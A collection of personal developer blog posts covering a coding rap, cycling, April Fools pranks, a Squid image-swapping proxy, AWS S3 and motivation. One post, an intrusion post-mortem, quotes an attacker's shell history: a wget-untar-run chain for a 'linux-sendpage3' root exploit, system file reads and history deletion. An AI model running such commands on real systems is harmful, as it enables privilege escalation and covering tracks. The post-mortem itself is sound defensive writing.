Coding to the beat, yo

I Decided to Be a Code Rapper

What’s up, cracker.  Listen to the beat and get the codin’ going.  Feelin’ the keys beneath the fingers.  No time to stop at Wingers, for fries and lies and all the colorful colors.  Gotta get coding, the day is nigh.  When we release, it’s gonna be big, like the kid on a bike riding for the first time.  So no time for the playin’, just get the groove on, get in the zone, hack it out… no talking on the phone.  No meetings are important enough.  We’ve got all the right stuff.  This is what we’ll never forget.  Blow any idea of algorithms out the door, we come up with our own shi’.  I’m not throwin’ a fit.  Stick to the music, the keys, the Code.  That’s what it’s all about, yo!

Bonus Coding

Last weekend I biked my first century.  It was an “easy” course and was supposed to be a beautiful day.  I wasn’t expecting anything to go wrong, but as luck would have it, a lot did.  I struggled to finish.

Looking back, I think there are a few reasons why it wasn’t as easy as I had hoped:

  • I got 5 hours of sleep the night before
  • I didn’t train much
  • I didn’t drink enough water the night/week before
  • I got lost, and ended up biking an extra six miles

Whoa, back up… what was that last one?

“I ended up biking an extra six miles”

I’d like to call these my “bonus miles”.  Even though I went off-course, lost a few minutes off my time, and made the rest of the race a little harder… it forced me to push myself further, got me a better workout, and gave me the confidence that, if needed, I can go even further.  It also taught me a valuable lesson – don’t get lost.  So even though it was a short-term loss, it ended up being a long-term gain.

So how does this relate to programming?

Bonus coding.  Sometimes we get lost in what we are programming.  Sometimes it’s a miscommunication.  Sometimes it’s a false assumption.  But oftentimes we find ourselves in a place where we’ve coded for a long time and end up having to throw it all away.  It’s not the best feeling in the world – it actually makes you feel like you’ve just wasted valuable time of your life.  But it’s more than that.  You’ve gained more experience in the wrong way to code.  Like biking, it’s a short-term loss, but a long-term gain.  Just learn from it and try not to repeat the same mistakes.

Just remember in your coding that your career isn’t a sprint, it’s a century – a marathon.  Go at a steady pace, learn from your mistakes, and don’t get yourself down at short-term losses.

Failed Internet April Fools Pranks

It’s another year of the major internet holiday, and once again there are a lot of half-assed April Fools “pranks”.  This time, however, I decided to compile a list of the ones I saw and explain why they suck.  Most are fake products.  Lots are straight-up marketing.  They’re all stupid.

This is by no means a comprehensive list (that would take way too long), but is just the ones I saw that made me say “lame”.

What Sucks

“Google Goes Nuclear” (TechCrunch) - Google to use its own nuclear power plants.  Never mind that this was actually published a day early; even the idea is stupid.  It probably had the same amount of thought as the rest of their posts – about none.

“Store Anything In Google Docs” (Google) - Put your apartment in Google Docs.  Ok, it probably took about 2 minutes to think of the idea, and another 5 to write down some “user reviews”.  There was absolutely no planning involved, and I doubt it tricked anyone.  If I wanted to read crap like this, I’d read The Onion.

“iCade” (ThinkGeek) - While this one is actually believable, it still falls short of fooling anyone.  Does it make anyone look stupid?  Nope, just Apple.  This “prank” was designed just to drive traffic to the site (by targeting a high-profile item like the iPad), and is not clever in any way.  Props do go out for actually building an arcade cabinet and taking pictures.  Again, if I wanted crap like this, I’d read The Onion.

“Hulu Confidential” (Hulu) - Hulu exposes its “Alien Plot”.  While the video production is quality, and it is an interesting plot, this was 100% designed by their marketing department (and it shows).  This could have been released any day of the year and nobody would have known the difference.


The Good Stuff

There were a few that I actually got a good chuckle at:

“4chan” (4chan) - They just tweeted about 4chan 2.0.  This was great – what a way to poke fun at the rest of the internet.  Everyone thinks that Facebook Connect is the key to unlocking additional content, which facilitates additional revenue, etc., etc.  4chan is proof that thriving communities can and do still exist in a way that doesn’t directly correlate to revenue, and that all the web 2.0 gloss and tight social-network integration is complete BS.  I love it.

“Admin For A Day” (reddit) - Reddit made it appear that a code glitch allowed everyone to have admin rights.  This actually took some foresight and programming, and doesn’t appear to directly tie to traffic/revenue.  It’s just good old-fashioned fun.

Command-line website” (xkcd) - Browsing the site through the command-line… absolutely brilliant.

If it weren’t for these 3 sites, my April Fools would have been a waste.  Thanks guys.

April Fools Prank – Changing Images With Squid

Well, that time is upon us… time for April Fools.  I’m not very good at coming up with good pranks, but a friend of mine, Chris Alef, gave me a great idea: swap all the product images on our site for pictures of our management.

Pretty simple and funny idea, but how do you make it work?  It was a lot easier than I thought.  The first idea was to use a proxy and route all traffic from the office through it.  That seemed less than ideal – if the proxy went down, so would everyone’s web access.  Orders would stop shipping, buyers would stop buying, and I would be in a lot of trouble.  There had to be a less risky way to do it.  Well, our images (all our static content, I guess) are hosted on a single domain.  Limited to a single domain, eh?  We have an internal DNS, so if we could stand up a proxy for that domain that changes only a few images, we could just update the DNS to point at the proxy.  Brilliant!

I started up an EC2 instance of Ubuntu, installed squid, and started configuring it.  I followed roughly the same pattern as the Upside-Down-Ternet, using a redirector.  In all, these are the configs I changed/used in /etc/squid/squid.conf:

# (the origin hostname and redirector path below are placeholders)
redirect_program /tmp/redirect.pl
redirect_children 20
http_access allow all
http_port 80 accel vport=80
cache_peer images.example.com parent 80 0 no-query originserver

where the cache_peer host is the origin server (what to proxy), and the script under /tmp/ is the redirector.  Without the redirector, this would be a completely transparent proxy for static content.  Now, the redirector code:



#!/usr/bin/perl
# NOTE: the replacement image URLs below are placeholders
my @images = (
  "http://proxy.example.com/swap/boss1.jpg",
  "http://proxy.example.com/swap/boss2.jpg",
);

$| = 1;  # unbuffered -- squid expects one rewritten URL back per input line

while (<>) {
  my $tmp = $_;
  if ($tmp =~ /images\/items\/medium/) {
    print $images[int rand(scalar @images)] . "\n";
  } else {
    print $tmp;
  }
}
Restart squid, and done!  Now just test it by updating your /etc/hosts to point the image domain at the IP of the proxy.  Behold, the result:

"Jill looks good, doesn't she?"

I ended up not doing it.  I really didn’t feel it was worth risking my job over a prank gone wrong.  If I could have found a better way to do it than updating the DNS, even the internal one, I would have done it.  But it was just too risky at my company.  Oh well, now you all know how to do it :)

The Site Was R00ted

As you might know, there was a little bit of downtime… from December 28 to January 6th.  First of all, sorry about that… I was doing a bunch of holiday stuff.  At any rate, when I noticed the EC2 instance was unresponsive, I figured it was the fault of EC2.  So, I just rebooted the instance and went on my merry way.

Flash forward to today.  I got on my box to do some maintenance, and saw the following warning:

~/tmp$ ls
> ls: unrecognized prefix: do
> ls: unparsable value for LS_COLORS environment variable.

“Well that’s weird”, I thought to myself.  I googled around the internet, and came to the conclusion I’d been rooted.  Turns out, I was right.

Mistake #1

Now comes the fun part of all of this.  I had to track down just *how* it happened.  The first thing I did was check /var/log/auth.log.  I see brute-force attacks all the time, and they totally fill up the logs, so I jumped to where it made the most sense — around the time the site went down.  That’s when I noticed this entry:

Dec 28 14:03:25 ip-10-251-69-178 sshd[13661]: Accepted password for deploy from port 2608 ssh2
Dec 28 14:03:25 ip-10-251-69-178 sshd[13661]: pam_unix(sshd:session): session opened for user deploy by (uid=0)


I had forgotten I created a mostly temporary user named “deploy” with a weak password (umm… “deploy”).  I thought it would be ok since that user had very few permissions — files I didn’t care about, no sudo access, etc.  Boy, was I wrong.  Which brings me to…

Mistake #2

Everyone always says to keep your system up to date.  I also think it’s a good practice.  But do I?  Of course not.  I was running an outdated (non-updated) version of Ubuntu 8.10.  Put yourself in the hax0r’s shoes: if you were breaking into a box, had user access, the OS was out of date, and you wanted root, how would you do it?  A rootkit, of course!  And that’s exactly what happened…

uname -a
sudo su
ls -a
cat .bash_history
cat /proc/cpuinfo
cat /etc/issue
cat /etc/hosts
wget;tar zxvf l3.tar.gz;cd linux-sendpage3;chmod 777 *;./run;id
ls -a
rm -rf .bash_history
wget;tar zxvf l3.tar.gz;cd linux-sendpage3;chmod 777 *;./run;id
sudo su -

A little side note… if he removed the bash_history, how did I get this command history?  Look closely… whatever script it was, it “cd”ed into the linux-sendpage3 directory before it rm’ed the bash_history, so it only wiped the copy inside that directory and left the real ~/.bash_history intact.  Sucka :) .  Anyways, there’s the rootkit, and him logging in as root with “sudo su -”.

He was root.  OMG!

The next part seems kind of fuzzy to me as to what he did.  I didn’t have any logs (root’s bash_history was clean), and there were no logs anywhere else on the system.  What I did have was one thing: ls was acting funky.  Surely he replaced it, so at least it would be a start.  Upon further inspection, it was owned by the user 122, and group messagebus.  Well, at least that’s a start!

root@ip-10-251-69-178:~/bin# find / -user 122

It looks like he changed a bunch of important files here; he certainly didn’t want me snooping into what he was doing.  Those modifications hid all the files and processes he was using, of course.  So my next step was to restore those files so I could dig deeper into what was going on.  With EC2, that’s a piece of cake — I fired up another Ubuntu 8.10 AMI and copied over the binaries.  Here’s where I got bottlenecked… I was getting a silly “Permission denied” error, even though I was root!  lsattr to the rescue.

root@ip-10-251-69-178:~/bin# lsattr /bin/ls
s---ia------------- /bin/ls

Super-secret permissions (the immutable and append-only attribute flags)!  No!

root@ip-10-251-69-178:~/bin# chattr -sia /bin/ls; mv /tmp/ls.fix /bin/ls

Whew, that was a close one.

Next, I ran the ‘find’ command again to see if other files had shown up, and indeed they had.  Two directories, “/usr/lib/libsh” and “/lib/”, were owned by this guy.  There were a few utility scripts in these directories to clean logs and such, and also some program named mirkforce — which looks like some IRC bot.  So, all of this for some stupid script kiddie?  Augh, lame.

There were two other things that I got bored with and didn’t look into anymore — a crontab as root that executed “/dev/s/y2kupdate >/dev/null” every minute (thanks for keeping my computer updated), and some dbus process that hogged a bunch of resources.

At any rate, there were two things that came out of this:

  1. Don’t use easy passwords.  Ever.
  2. Keep your systems up-to-date.
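On the first lesson, a concrete (if hedged) suggestion: if I were setting that box up again, I’d make weak passwords a non-issue by turning off password logins entirely.  A sketch of the relevant /etc/ssh/sshd_config lines (assuming key-based login is already set up; the username is a placeholder):

```
# Keys only -- a guessable password is useless to a brute-forcer
PasswordAuthentication no
# Don't allow direct root logins over ssh
PermitRootLogin no
# Optionally, whitelist only the accounts that actually need ssh
AllowUsers myuser
```

Restart sshd after editing, and keep an existing session open while you test so you don’t lock yourself out.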

I’m sure this entire thing was automated, so I didn’t fear stolen information much (not that there was any to steal).  He left all my data in place, so I just ditched the whole box, fired up another EC2 instance, and was running on a fresh install of Ubuntu 9.10 in about 10 minutes.  Amazon Web Services win again!

Programming as a Form of Self-Expression

I just got back from Elton John and Billy Joel, and being there reminded me of something I’ve been thinking about for quite a while: programming as an art form. I get a lot of inspiration from the arts — actually, I first started thinking about this back in December when I went to “A Jon Schmidt Christmas”. I thought… this guy doesn’t have a chance to “make it big”, but he’s completely happy where he’s at. If he played in front of 10 people, he would be completely happy. Take that to Elton John and Billy Joel, and I think the same goes for them. They’re getting older. They don’t have to play music. But they do. They love to do it, they’re good at it, and that’s what makes them happy. So my question is, why can’t computer engineers do that? Are we really so technical, digging into the details, gathering requirements, making estimations, doing test-driven development, that we can’t express ourselves through code? Well, I think we can.

This might be where frameworks like Django and Ruby on Rails come into play.  They allow you to make what you want, without the crap.  When you have an idea, you can make it.  You can express your ideas quickly and easily.  You don’t worry about design patterns, because it’s all there for you.  All that’s left for you is to “paint the picture”.  Just hack it out; it doesn’t matter what the code looks like.  Take a look at the most “artistic” programmers out there — the hax0rs of the world.  Many of them are absolutely brilliant… but you wouldn’t think so by looking at their code.  Heck, most of them don’t write object-oriented code — a must in the business world.  They hack out a script that just does the job, and nothing more.  I wouldn’t say that’s a bad thing.  It does what it’s supposed to.  What more is needed?

At any rate, I think that the longer I’m a programmer by profession, the further I get away from artistic expression in programming.  While I don’t think “hacking out a solution” is a good idea for a business, I still think programmers need to do quick hacks on their own, and make something that actually *does* something, with minimal effort.  I want to be like Billy Joel when I get old and still be killing it at 60, or be like one of my personal heroes, Woz.  I don’t have the answer for how to get an old-timer like myself excited about that kind of thing, but when you figure it out, let me know.

“No We Can’t”: Engineers Today Are Lazy

Some coworkers and I had a nice discussion over dinner tonight about how things have changed over time.  More particularly, we talked about the wildly popular game “Duck Hunt”.  Yes, the Nintendo one.  How in the world does that thing work?  After some discussion, Nate Brunson finally whipped out his iPhone and came across an article detailing how Duck Hunt works.  It’s all pretty interesting stuff, and it was all done way before its day.

But Nintendo wasn’t Agile!

The thing is, if Nintendo had been operating in the “agile” world of today, would it have released Duck Hunt?  Would Duck Hunt ever have existed?  My inclination is no.  It would have been labeled “too much scope for the first increment; we should release Mario Brothers, analyze the results, and go from there”.  Immediately following Mario Brothers, which would be a hit (obviously), they would follow up with Mario Bros 2, because hey, the first one did well.  After 2, the third increment would be… (surprise) Mario Bros 3.  Eventually the idea of Duck Hunt would have been forgotten.

If you want to change the world, don’t wait until the next increment

The point is that sometimes innovation comes at a cost.  You can’t always slim down functionality to meet a deadline and still expect to be innovative.  If there is an incredible idea out there to be had — even if you’re not sure how much time it will take, what resources need to be devoted, or even whether it’s possible — you still need to just go for it.

Where did we go wrong?

Why are we so afraid to just get things done?  I personally think it comes down to people not wanting accountability, or wanting to be absolutely positive that they can do what they say.  They are afraid to stretch themselves.  They really don’t care about being innovative.  They care about the business, about money, and about following a “standard procedure” or “the most effective way of doing something”.  Seth Godin is very popular and incredibly successful because he gives people the magic formula for creating a good product.  The only problem is that he doesn’t do it for you.  I’m not saying processes are a bad thing; I’m just saying that eventually some crazy guy needs to sit down, do the impossible, and get it done.  Don’t believe me?  How about the names Steve Wozniak, Ed Logg, or Brad Fitzpatrick?  Chew on them apples….

Thought: Staying Motivated With a Personal Project

I’ve had a lot of thought and conversation lately about how to stay motivated.  The fact is that we’re all human, and we all have ups and downs.  Even if you’re super-motivated about doing something one day, the next day you might not be.  I know I’ve had a lot of personal experiences where I get on a kick for a couple days, hammer out some code, then someone says “eh, that sucks”.  It’s a total downer!  Well, here are a few tactics you can try to stay motivated.

  • Don’t listen to what other people say about your stuff, unless it will help make it better or point out an obvious flaw.
  • Remember that if someone takes the time to give feedback, it usually means there’s something you can act on.
  • If you work on something a while and become disinterested, keep what you’ve done around.  Who knows, you may pick it up and continue working on it several months down the road.
  • Finish things through to completion

I think the last point is the most important.  As software developers, we become distracted very easily.  Oftentimes we become so entranced by every new technology and every different way of doing things that we never get a finished product.  The old tale that “an application is never finished” has put a bad taste in my mouth since the first time I heard it.  While there’s always room for improvement, finishing and releasing a product, and setting milestones for future work, is vital.  Working in bigger companies we sometimes forget that – that’s why there are project managers, product managers, etc., etc.  We could learn a thing or two from those guys and apply it to our own side projects.

Aside from the “setting goals” part, most of the work happens within a very small timeframe.  It’s called being “in the zone”.  That’s the programmer’s time, when you are completely focused on the task at hand and cannot be distracted by anything.  This is the most important time to keep programming.  If you have to stay up all night, then do it.  Here’s what Joel Spolsky (who I normally read for entertainment, not for how to do my job – a topic for another post… but this is good) has to say about being “in the zone”:

“Here’s the trouble. We all know that knowledge workers work best by getting into “flow”, also known as being “in the zone”, where they are fully concentrated on their work and fully tuned out of their environment. They lose track of time and produce great stuff through absolute concentration. This is when they get all of their productive work done. Writers, programmers, scientists, and even basketball players will tell you about being in the zone. The trouble is, getting into “the zone” is not easy. When you try to measure it, it looks like it takes an average of 15 minutes to start working at maximum productivity. Sometimes, if you’re tired or have already done a lot of creative work that day, you just can’t get into the zone and you spend the rest of your work day fiddling around, reading the web, playing Tetris.”

If you only have time once a week to get “in the zone”, then plan it.  Turn off your cell phone, close your IMs, tell your wife you love her and won’t see her for a bit, and set the expectation that, for example, every Thursday night you’ll be hacking away and completely unavailable.  Try to know beforehand what “business decisions” or functionality you want to include.  I think about it when I’m trying to get to sleep at night, taking a shower, eating breakfast, whatever.  I try to write down what I think of the next chance I get.  But when it comes to getting it done, that night of being alone is vital.

This was kind of a hacked out, not-completely-thought-out thought, I will hopefully try to organize it a bit better and follow up in another blog post, but this is just what I’ve been thinking about.  As always, your opinions and insights are appreciated, whether it’s through email or a comment.

S3 at a Real-world Company

Let’s face it, most bigger companies nowadays are afraid of trying something new.  That happens with good reason – most new ideas tend to fall by the wayside, as trends normally do, and companies like to play it as safe as possible.  I see new ideas and frameworks popping up all over the Twittersphere every day, and I wouldn’t consider using any of them in a production environment.

Amazon Web Services Isn’t Just a Pie-In-The-Sky

The reason I bring this up is this – Amazon Web Services in the business (not startup) world is still considered a new, unproven technology.  And with all the marketing hype around clouds, infinitely scalable services, etc., etc., I honestly don’t blame them.  It’s hard to believe a pie-in-the-sky promise.  But that’s just the point – AWS is not pie in the sky, and people who think it is need to dig deeper and understand what it is and what it offers.  The fact is that Amazon Web Services has been around since 2002, with uptime that is most likely better than your data center’s.  Amazon knows this too, and is trying to eliminate that false perception: it is good for your company to use it as well.  They published an article on the subject, along with an updated cost calculator and an Excel spreadsheet to compare your datacenter against AWS.

Ok, so the real reason for this article.  At my company, we try hard to stay as close as we can to the bleeding edge, but going into “the cloud” has always received serious backlash.  That is, until recently.  Earlier this month we took advantage of the cloud for the first time in a production environment, by using S3 for our “Jumbo” product images.

First, let me explain the reasons we decided to use S3.  Our webapp tier, consisting of a few boxes, hosts the Interchange e-commerce framework and also contains all our static content.  The trouble was, the 900x900 images consumed about 100 GB of disk space, but each box had less than 20 GB left.  That left us with one of two traditional options: put new hard disks in each webapp box, or use our NetApp to host the images from a single location.  Neither seemed ideal, since putting in new hard disks would be pricey and could take some time, and we were already short on NetApp space given the current budget.  I had done some side work using S3, and mentioned it.  Chris Alef pushed the decision as a great idea, and it was agreed to do it.

Flash forward one week, and we were ready to go live.  We converted and uploaded the 900x900 images to S3 over the weekend, and got the UI in place in no time flat.  We have Akamai hosting edge cache in front of S3, and we’ve had zero problems since launch last month.  I asked our operations team what they thought the bill for the month would be, and they guessed $4,000.  The actual bill?  Under $50.  Granted, Akamai probably took most of the traffic, but that’s still mighty impressive.
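A quick back-of-the-envelope check shows why the bill stays tiny when a CDN soaks up most of the requests.  The rates below are rough 2009-era S3 prices (about $0.15 per GB-month of storage and $0.17 per GB of outbound transfer), and the transfer figure is a made-up example, so treat this strictly as a sketch:

```python
def s3_monthly_cost(stored_gb, transfer_out_gb,
                    storage_rate=0.15, transfer_rate=0.17):
    """Rough monthly S3 bill: storage plus outbound transfer (request fees ignored)."""
    return stored_gb * storage_rate + transfer_out_gb * transfer_rate

# ~100 GB of jumbo images, with the CDN absorbing almost all image traffic:
print(round(s3_monthly_cost(100, 200), 2))  # prints 49.0
```

With a CDN in front, most of the transfer term lands on the CDN bill instead, which is how a 100 GB image store can cost next to nothing on the S3 side.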

There’s so much more we can do with AWS, and I hope this is just the start.  I hope to be able to take advantage of other AWS services such as EC2 and SQS in the future, and I think S3 helped build confidence.  AWS is a service that can be relied on for both startups and established internet businesses alike.

YUI-Magnifier Released

A coworker of mine, Dustin McQuay, released the YUI Magnifier, a YUI implementation of other popular image-zoom utilities.  We were actually surprised to see that nothing like it already existed for YUI, so Dustin took on the challenge of building his own, with the hope that it might be included in larger YUI libraries.

It boasts the following features:

  • Display a magnified portion of an image, which is controlled by where the mouse is hovering over the image
  • Control over styling
  • Control over location of magnification lens
  • Magnified image can be wrapped by a larger element

Though the release wasn’t very public, it was still quite an accomplishment.  It happens to be one of the first open-source releases from the company (preceded, to my knowledge, only by Bucardo, a Postgres replication application written for us by Endpoint).  It was originally designed to be used for our 900x900 images, but got cut after development had essentially finished, due to changed requirements.

It’s a pretty solid application, and hopefully the start of more open source coming out of the company.